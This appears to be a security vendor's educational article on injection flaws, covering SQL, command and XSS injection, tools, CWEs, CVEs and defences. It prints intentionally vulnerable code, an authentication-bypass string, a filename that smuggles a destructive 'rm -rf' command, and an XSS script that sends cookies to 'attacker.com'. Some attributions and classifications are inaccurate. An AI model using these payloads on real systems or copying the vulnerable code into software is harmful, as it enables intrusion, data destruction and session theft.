16 Feb, 2023

Injection Flaws

Vulnerability Assessment as a Service (VAaaS)

Tests systems and applications for vulnerabilities to address weaknesses.

Injection flaws refer to a type of security vulnerability in computer systems and software applications that allow an attacker to inject and execute unintended code or commands into an application’s input fields.

Attackers can take advantage of injection flaws by injecting malicious code or commands into input fields, such as login forms, search boxes, or any other areas where user input is accepted. This can result in the execution of unintended actions, such as retrieving sensitive data, modifying or deleting data, or even gaining unauthorized access to the entire system.

Example of vulnerable code on different programming languages:


in Injection in PHP:

				
					$username = $_POST['username'];
$password = $_POST['password'];

$query = "SELECT * FROM users WHERE username = '$username' AND password = '$password'";
$result = mysqli_query($conn, $query);

				
			


In this code, an attacker can manipulate the input values of the username and password fields to inject SQL code that can modify or delete data from the database. To prevent this, developers should use prepared statements or parameterized queries to avoid directly embedding user input into SQL queries.

• in SQL Injection in Java:

				
					String username = request.getParameter("username");
String password = request.getParameter("password");

String query = "SELECT * FROM users WHERE username = '" + username + "' AND password = '" + password + "'";
ResultSet result = statement.executeQuery(query);

				
			


Similar to the PHP example, an attacker can manipulate the username and password fields to inject SQL code. To prevent this, developers should use parameterized queries or stored procedures instead of building SQL statements dynamically.

• in Command Injection in Python:

				
					import os

filename = input("Enter a file name: ")
os.system("rm " + filename)

				
			


In this code, an attacker can enter a malicious command as the filename input, which will be executed by the os.system() function, allowing the attacker to execute arbitrary code. To prevent this, developers should use proper input validation and sanitization and avoid using user input directly in shell commands.

• in Cross-Site Scripting (XSS) in JavaScript:

				
					var searchQuery = document.getElementById("searchBox").value;
document.write("Search results for: " + searchQuery);

				
			


In this code, an attacker can inject malicious scripts into the searchQuery variable, which will be executed when the document.write() function is called. To prevent this, developers should sanitize all user input and avoid using document.write() or other functions that can execute user input as HTML or script code.

Examples of exploitation Injection Flaws

• SQL Injection Exploitation:

An attacker can inject malicious SQL code into an input field, such as a search box, login form, or comment section, to gain access to sensitive data or modify the contents of a database. For example, an attacker can enter the following code into a login form:

				
					' OR 1=1--

				
			


This will bypass the authentication check and allow the attacker to log in as any user in the database.

Command Injection Exploitation:

An attacker can inject malicious commands into an input field, such as a file upload form or a search box, to execute arbitrary code on the server. For example, an attacker can upload a file with the following name:

				
					file; rm -rf /*

				
			


This will execute the rm -rf /* command on the server, deleting all files in the root directory.

Cross-Site Scripting (XSS) Exploitation:

An attacker can inject malicious scripts into a web page to steal sensitive information or hijack user sessions. For example, an attacker can inject the following script into a comment section:

				
					<script>
  fetch('http://attacker.com/log?key=' + document.cookie)
</script>


				
			


This will send the victim’s cookies to the attacker’s server, allowing the attacker to impersonate the victim on the website.

Privilege escalation techniques for Injection Flaws

SQL Injection Privilege Escalation:

An attacker can use SQL injection to gain access to an application’s database and then escalate privileges by modifying or adding data to certain tables. For example, an attacker can modify a user’s role in the database to gain administrative access to the application.

Command Injection Privilege Escalation:

An attacker can use command injection to gain access to a system’s command line interface and then escalate privileges by executing commands with higher levels of privilege. For example, an attacker can use the sudo command to run commands as the root user.

Cross-Site Scripting (XSS) Privilege Escalation:

An attacker can use XSS to steal user cookies or session tokens, and then use these to impersonate the user and gain access to higher levels of privilege within the application. For example, an attacker can use stolen cookies to bypass authentication checks and gain administrative access to an application.

File Inclusion Privilege Escalation:

An attacker can use file inclusion vulnerabilities, such as Local File Inclusion (LFI) or Remote File Inclusion (RFI), to gain access to sensitive files on the server and then escalate privileges by modifying these files. For example, an attacker can modify a configuration file to grant themselves administrative access to the application.

General methodology and checklist for Injection Flaws

Methodology:

  1. Identify all user input points in the application: Look for any input fields, parameters, or API endpoints that take user input.

  2. Determine the data types and ranges accepted by each input point: Check the data types (e.g., strings, integers, dates) and ranges (e.g., maximum and minimum values) accepted by each input point. This information will help you craft appropriate payloads for each input point.

  3. Generate test cases and payloads: Craft test cases and payloads to test each input point. Test cases should include both valid and invalid input, and payloads should include various characters, such as single quotes, double quotes, semicolons, and parentheses, which are commonly used in injection attacks.

  4. Test for common injection vulnerabilities: Use known injection vulnerabilities to test each input point. For example, test for SQL injection by inserting SQL commands into input fields, test for command injection by inserting command-line commands into input fields, and test for XSS by inserting scripts into input fields.

  5. Test for custom injection vulnerabilities: Test for custom injection vulnerabilities by crafting payloads that exploit application-specific vulnerabilities, such as custom input validation routines that can be bypassed with carefully crafted input.

  6. Analyze results: Analyze the results of your tests to identify vulnerabilities and determine their severity. For each vulnerability, determine the impact on the application, the likelihood of exploitation, and the risk to the organization.

  7. Report and fix vulnerabilities: Report vulnerabilities to the appropriate stakeholders, including developers, security teams, and management, and work with them to fix the vulnerabilities.

  8. Retest: Retest the application after the vulnerabilities have been fixed to ensure that they have been successfully remediated.

Checklist:

  1. Identify all user input points: Identify all input points in the application that accept user input, such as input fields, parameters, and API endpoints.

  2. Test for SQL injection: Test each input point for SQL injection vulnerabilities by injecting SQL commands into the input fields.

  3. Test for command injection: Test each input point for command injection vulnerabilities by injecting command-line commands into the input fields.

  4. Test for XSS: Test each input point for cross-site scripting (XSS) vulnerabilities by injecting scripts into the input fields.

  5. Test for file inclusion vulnerabilities: Test each input point for file inclusion vulnerabilities, such as local file inclusion (LFI) and remote file inclusion (RFI), by injecting file paths into the input fields.

  6. Test for LDAP injection: If the application uses LDAP for authentication or authorization, test each input point for LDAP injection vulnerabilities by injecting LDAP commands into the input fields.

  7. Test for XML injection: If the application uses XML for data exchange, test each input point for XML injection vulnerabilities by injecting XML entities into the input fields.

  8. Test for code injection: Test each input point for code injection vulnerabilities, such as PHP code injection, by injecting code snippets into the input fields.

  9. Test for OS command injection: Test each input point for OS command injection vulnerabilities, such as Windows command injection, by injecting OS commands into the input fields.

  10. Test for NoSQL injection: If the application uses a NoSQL database, test each input point for NoSQL injection vulnerabilities by injecting NoSQL queries into the input fields.

  11. Test for custom injection vulnerabilities: Test for custom injection vulnerabilities by crafting payloads that exploit application-specific vulnerabilities, such as custom input validation routines that can be bypassed with carefully crafted input.

  12. Test for input validation and sanitization: Test the application’s input validation and sanitization routines to ensure that they effectively block malicious input.

  13. Analyze results: Analyze the results of your tests to identify vulnerabilities and determine their severity. For each vulnerability, determine the impact on the application, the likelihood of exploitation, and the risk to the organization.

  14. Report and fix vulnerabilities: Report vulnerabilities to the appropriate stakeholders, including developers, security teams, and management, and work with them to fix the vulnerabilities.

  15. Retest: Retest the application after the vulnerabilities have been fixed to ensure that they have been successfully remediated.

Tools set for exploiting Injection Flaws

Manual tools:

  • Burp Suite: A popular web application testing tool that includes features for identifying and exploiting SQL injection, XSS, and other injection vulnerabilities.

  • SQLMap: An open-source penetration testing tool that automates the process of detecting and exploiting SQL injection vulnerabilities.

  • Havij: A user-friendly tool for automated SQL injection attacks, with features for fingerprinting, database enumeration, and data extraction.

  • BeEF: A browser exploitation framework that allows attackers to control and manipulate web browsers to perform various attacks, including injection attacks.

  • Exploit Pack: A comprehensive penetration testing framework that includes a wide range of tools for identifying and exploiting injection vulnerabilities, among other security issues.

  • Nmap: A network exploration and security auditing tool that includes features for identifying open ports and running services, which can be useful for identifying potential injection points.

  • Metasploit: A widely-used penetration testing tool that includes modules for exploiting a range of injection vulnerabilities, as well as other security issues.

  • W3af: A web application attack and audit framework that includes modules for identifying and exploiting injection vulnerabilities, as well as other web-based security issues.

  • Acunetix: A commercial web application security scanner that includes features for identifying and exploiting injection vulnerabilities, as well as other web-based security issues.

  • ZAP: An open-source web application security scanner that includes features for identifying and exploiting injection vulnerabilities, as well as other web-based security issues.

Automated tools:

  • AppScan: A commercial web application security scanner that includes features for identifying and exploiting injection vulnerabilities, as well as other web-based security issues.

  • Netsparker: A commercial web application security scanner that includes features for identifying and exploiting injection vulnerabilities, as well as other web-based security issues.

  • Qualys Web Application Scanning: A cloud-based web application security scanner that includes features for identifying and exploiting injection vulnerabilities, as well as other web-based security issues.

  • IBM Security AppScan: A commercial web application security scanner that includes features for identifying and exploiting injection vulnerabilities, as well as other web-based security issues.

  • Rapid7 InsightAppSec: A cloud-based web application security scanner that includes features for identifying and exploiting injection vulnerabilities, as well as other web-based security issues.

  • Detectify: A cloud-based web application security scanner that includes features for identifying and exploiting injection vulnerabilities, as well as other web-based security issues.

  • OWASP Zed Attack Proxy (ZAP): An open-source web application security scanner that includes features for identifying and exploiting injection vulnerabilities, as well as other web-based security issues.

  • WebInspect: A commercial web application security scanner that includes features for identifying and exploiting injection vulnerabilities, as well as other web-based security issues.

  • PortSwigger Burp Suite: A web application testing tool that includes features for identifying and exploiting injection vulnerabilities, as well as other web-based security issues.

  • Trustwave App Scanner: A commercial web application security scanner that includes features for identifying and exploiting injection vulnerabilities, as well as other web-based security issues.

Browser plugins:

  • Tamper Data: A Firefox extension that allows users to view and modify HTTP/HTTPS requests and responses, which can be useful for testing for injection vulnerabilities.

  • Hackbar: A Firefox extension that allows users to easily perform various web application attacks, including injection attacks.

  • SQL Inject Me: A Firefox extension that allows users to easily test for SQL injection vulnerabilities in web applications.

  • XSS Me: A Firefox extension that allows users to easily test for cross-site scripting vulnerabilities in web applications.

  • Postman: A Chrome extension that allows users to

Average CVSS score of stack Injection Flaws

The average CVSS score of stack injection flaws can vary widely depending on the specific vulnerability and its severity. CVSS, or the Common Vulnerability Scoring System, is a standardized method of rating the severity of security vulnerabilities, with scores ranging from 0 to 10.

Injection flaws can be particularly serious, as they can allow attackers to execute arbitrary code or access sensitive data. Some injection vulnerabilities, such as remote code execution, may be rated as critical, with CVSS scores of 9.0 or higher. Other injection vulnerabilities, such as SQL injection or cross-site scripting, may be rated as high, with CVSS scores in the 7.0 to 8.9 range. However, the specific CVSS score for any given injection flaw will depend on a variety of factors, including the type and severity of the vulnerability, the complexity of the application, and the potential impact on the system and users. It is important to note that CVSS scores are only one factor to consider when assessing the severity of a security vulnerability, and that other factors such as the potential impact on users and the organization should also be taken into account.

The Common Weakness Enumeration (CWE)

CWE-89: SQL Injection – This is one of the most common types of injection flaws, where an attacker can inject malicious SQL statements into a web application to gain access to sensitive data.

CWE-79: Cross-Site Scripting (XSS) – This type of injection flaw allows attackers to inject malicious code into a web application, which can be executed by unsuspecting users.

CWE-94: Code Injection – This type of injection flaw allows an attacker to inject malicious code into a web application, which can lead to arbitrary code execution.

CWE-611: Improper Restriction of XML External Entity Reference – This type of injection flaw occurs when an XML input is not properly validated or sanitized, which can lead to the disclosure of sensitive information or the execution of arbitrary code.

CWE-352: Cross-Site Request Forgery (CSRF) – This type of injection flaw allows attackers to trick users into performing actions on a web application that they did not intend to perform, such as making unauthorized transactions.

CWE-434: Unrestricted Upload of File with Dangerous Type – This type of injection flaw occurs when a web application allows users to upload files without proper validation or filtering, which can lead to the execution of malicious code.

CWE-116: Improper Encoding or Escaping of Output – This type of injection flaw occurs when a web application does not properly sanitize user input before displaying it to other users, which can lead to cross-site scripting attacks.

CWE-918: Server-Side Request Forgery (SSRF) – This type of injection flaw allows an attacker to send unauthorized requests to a web application, which can be used to access sensitive data or perform actions on behalf of the user.

CWE-601: URL Redirection to Untrusted Site – This type of injection flaw occurs when a web application allows users to redirect to external URLs without proper validation or filtering, which can be used to trick users into visiting malicious websites.

Top 10 CVES related to Injection Flaws

CVE-2022-30321 – go-getter up to 1.5.11 and 2.0.2 allowed arbitrary host access via go-getter path traversal, symlink processing, and command injection flaws. Fixed in 1.6.1 and 2.1.0.

CVE-2018-14956 – CMS ISWEB 3.5.3 is vulnerable to multiple SQL injection flaws. An attacker can inject malicious queries into the application and obtain sensitive information.

CVE-2017-9246 – New Relic .NET Agent before 6.3.123.0 adds SQL injection flaws to safe applications via vectors involving failure to escape quotes during use of the Slow Queries feature, as demonstrated by a mishandled quote in a VALUES clause of an INSERT statement, after bypassing a SET SHOWPLAN_ALL ON protection mechanism.

CVE-2017-1000247 -British Columbia Institute of Technology CodeIgniter 3.1.3 is vulnerable to HTTP Header Injection in the set_status_header() common function under Apache resulting in HTTP Header Injection flaws.

CVE-2014-0163 – Openshift has shell command injection flaws due to unsanitized data being passed into shell commands.

CVE-2012-2399 – Cross-site scripting (XSS) vulnerability in swfupload.swf in SWFupload 2.2.0.1 and earlier, as used in WordPress before 3.5.2, TinyMCE Image Manager 1.1 and earlier, and other products allows remote attackers to inject arbitrary web script or HTML via the buttonText parameter, a different vulnerability than CVE-2012-3414.

CVE-2011-4075 – The masort function in lib/functions.php in phpLDAPadmin 1.2.x before 1.2.2 allows remote attackers to execute arbitrary PHP code via the orderby parameter (aka sortby variable) in a query_engine action to cmd.php, as exploited in the wild in October 2011.

CVE-2011-4074 – Cross-site scripting (XSS) vulnerability in cmd.php in phpLDAPadmin 1.2.x before 1.2.2 allows remote attackers to inject arbitrary web script or HTML via an _debug command.

CVE-2011-3186 – CRLF injection vulnerability in actionpack/lib/action_controller/response.rb in Ruby on Rails 2.3.x before 2.3.13 allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via the Content-Type header.

CVE-2011-2930 – Multiple SQL injection vulnerabilities in the quote_table_name method in the ActiveRecord adapters in activerecord/lib/active_record/connection_adapters/ in Ruby on Rails before 2.3.13, 3.0.x before 3.0.10, and 3.1.x before 3.1.0.rc5 allow remote attackers to execute arbitrary SQL commands via a crafted column name.

Injection Flaws exploits

SQL injection:
An attacker can use SQL injection to bypass authentication or gain access to sensitive data by injecting malicious SQL code into a web application’s database.

Command injection:
An attacker can use command injection to execute arbitrary commands on a target system by injecting malicious code into a web application’s command-line interface.

Cross-site scripting (XSS):
An attacker can use XSS to inject malicious code into a web application’s pages, which can be executed by unsuspecting users and used to steal data or perform other malicious activities.

XML injection:
An attacker can use XML injection to modify the functionality of a web application by injecting malicious code into an XML input, which can be used to execute arbitrary code or disclose sensitive information.

LDAP injection:
An attacker can use LDAP injection to gain unauthorized access to a target system by injecting malicious code into an LDAP query.

XQuery injection:
An attacker can use XQuery injection to execute arbitrary code on a target system by injecting malicious code into an XQuery input.

XPath injection:
An attacker can use XPath injection to modify the behavior of a web application by injecting malicious code into an XPath query, which can be used to execute arbitrary code or disclose sensitive information.

Code injection:
An attacker can use code injection to execute arbitrary code on a target system by injecting malicious code into a web application’s source code.

HTTP header injection:
An attacker can use HTTP header injection to manipulate the headers of an HTTP request or response, which can be used to redirect users to malicious websites or steal sensitive data.

Server-side request forgery (SSRF):
An attacker can use SSRF to gain unauthorized access to a target system by manipulating the requests sent by a web application to other servers.

Practicing in test for Injection Flaws

Use vulnerable web applications: There are many web applications available that have been intentionally made vulnerable to injection attacks, such as the OWASP WebGoat project. These applications can be used to practice identifying and exploiting injection vulnerabilities in a safe and controlled environment.

Use testing tools: There are many automated tools available for testing injection vulnerabilities, such as Burp Suite, SQLMap, and OWASP ZAP. These tools can help identify vulnerabilities and provide guidance on how to fix them.

Use manual techniques: Manual techniques, such as fuzzing and manual testing, can also be effective in identifying injection vulnerabilities. For example, fuzzing involves sending large amounts of input to a web application to see if it responds unexpectedly or crashes.

Participate in capture the flag (CTF) events: CTF events are competitions where participants attempt to solve security challenges, such as identifying and exploiting injection vulnerabilities. These events can be a great way to practice testing skills in a fun and challenging environment.

Join online communities: There are many online communities dedicated to web application security, such as the OWASP community. Joining these communities can provide access to resources, training, and opportunities to collaborate with others on testing and exploitation exercises.

Attend training courses: Many organizations and training providers offer courses and workshops on web application security and testing. Attending these courses can provide hands-on experience and guidance on how to effectively test for injection flaws.

For study Injection Flaws

  1. OWASP Top 10: Injection: This is a detailed guide provided by the Open Web Application Security Project (OWASP) that covers the most common types of injection flaws, as well as mitigation techniques.

  2. Web Application Hacker’s Handbook: This is a book written by Dafydd Stuttard and Marcus Pinto that covers a wide range of web application security topics, including injection flaws. It provides practical examples and techniques for identifying and exploiting injection vulnerabilities.

  3. SQL Injection Cheat Sheet: This is a detailed guide provided by the SQL Injection Defense Project that covers different types of SQL injection attacks, as well as mitigation techniques.

  4. SQLMap: This is an open source tool for detecting and exploiting SQL injection vulnerabilities. It is a popular tool used by security professionals to identify and exploit injection flaws.

  5. Burp Suite: This is a widely-used tool for web application security testing, including testing for injection flaws. It provides features for manual testing, automated scanning, and more.

  6. Udemy: Udemy is an online learning platform that offers a variety of courses on web application security testing, including courses specifically focused on injection flaws.

  7. Hacker101: This is a free online training platform provided by HackerOne that offers a range of courses on web application security, including courses specifically focused on injection flaws.

  8. PentesterLab: This is an online training platform that offers a variety of courses on web application security, including courses focused on injection flaws.

  9. YouTube: There are many video tutorials available on YouTube that cover injection flaws and related topics. These can be a useful resource for visual learners who prefer video content.

  10. Online communities: There are many online communities dedicated to web application security, such as the OWASP community, where you can find resources, training, and opportunities to collaborate with others on studying injection flaws.

Books with review of Injection Flaws

“The Web Application Hacker’s Handbook: Finding and Exploiting Security Flaws” by Dafydd Stuttard and Marcus Pinto – This comprehensive book covers a wide range of web application vulnerabilities, including injection flaws, with detailed examples and practical guidance on how to prevent and mitigate them.

“SQL Injection Attacks and Defense” by Justin Clarke-Salt and Dan Boneh – Focused specifically on SQL injection, this book covers various aspects of this type of injection flaw, including detection, prevention, and remediation techniques.

“Secure Coding in C and C++” by Robert Seacord – This book provides a detailed guide on how to write secure code in C and C++, with a specific focus on preventing injection attacks.

“Python Web Penetration Testing Cookbook” by Cameron Buchanan, Terry Ip, Andrew Mabbitt, and Benjamin May – This book covers various web application vulnerabilities, including injection flaws, with practical examples and step-by-step guidance on how to identify and remediate them.

“The Basics of Hacking and Penetration Testing: Ethical Hacking and Penetration Testing Made Easy” by Patrick Engebretson – This beginner-friendly book provides an overview of web application security, including injection flaws, with hands-on exercises and real-world examples.

“Web Application Security, A Beginner’s Guide” by Bryan Sullivan, Vincent Liu, and Michael Howard – This book covers various web application security topics, including injection flaws, with practical examples and guidance on how to secure web applications.

“Cross-Site Scripting and JavaScript Worms” by Sebastien Deleersnyder, et al. – Focused specifically on cross-site scripting (XSS) and JavaScript worms, this book covers various aspects of these types of injection flaws, including detection and remediation techniques.

“Bulletproof Web Design: Improving flexibility and protecting against worst-case scenarios with HTML5 and CSS3” by Dan Cederholm – This book covers web design best practices that can help prevent injection flaws, such as input validation and sanitization.

“Gray Hat Python: Python Programming for Hackers and Reverse Engineers” by Justin Seitz – This book provides a practical guide on how to use Python for web application security testing, including identifying and exploiting injection flaws.

“OWASP Testing Guide v4” by The Open Web Application Security Project – This comprehensive guide covers various web application vulnerabilities, including injection flaws, with practical guidance on how to test for them and remediate any issues.

How to be protected from Injection Flaws

  1. Input validation: Validate and sanitize all user input before using it in any application logic. Input validation ensures that the data entered by the user is in the correct format, length, and type. It also helps to remove any unwanted characters that may cause injection attacks.

  2. Parameterized queries or prepared statements: Use parameterized queries or prepared statements to interact with databases. Parameterized queries separate user input from the query and reduce the risk of SQL injection.

  3. Use proper encoding and escaping: Ensure that any user input is properly encoded and escaped before being used in HTML, JavaScript, or other contexts. This can help prevent cross-site scripting (XSS) and other injection attacks.

  4. Limit privileges: Restrict user privileges as much as possible to minimize the impact of an attack. Only grant users the necessary access to perform their tasks.

  5. Stay up-to-date with security patches: Keep your software and libraries up-to-date with the latest security patches to minimize the risk of known vulnerabilities.

  6. Regularly perform vulnerability scanning and testing: Regularly scan your application for vulnerabilities and test for injection flaws to identify and address any potential issues.

Conclusion

Injection flaws are a serious security vulnerability that can have severe consequences for web applications, including data theft, system compromise, and other types of cyber attacks. Injection flaws occur when untrusted data is sent to an interpreter, which can then execute arbitrary code or commands on the system.

Other Services

Ready to secure?

Let's get in touch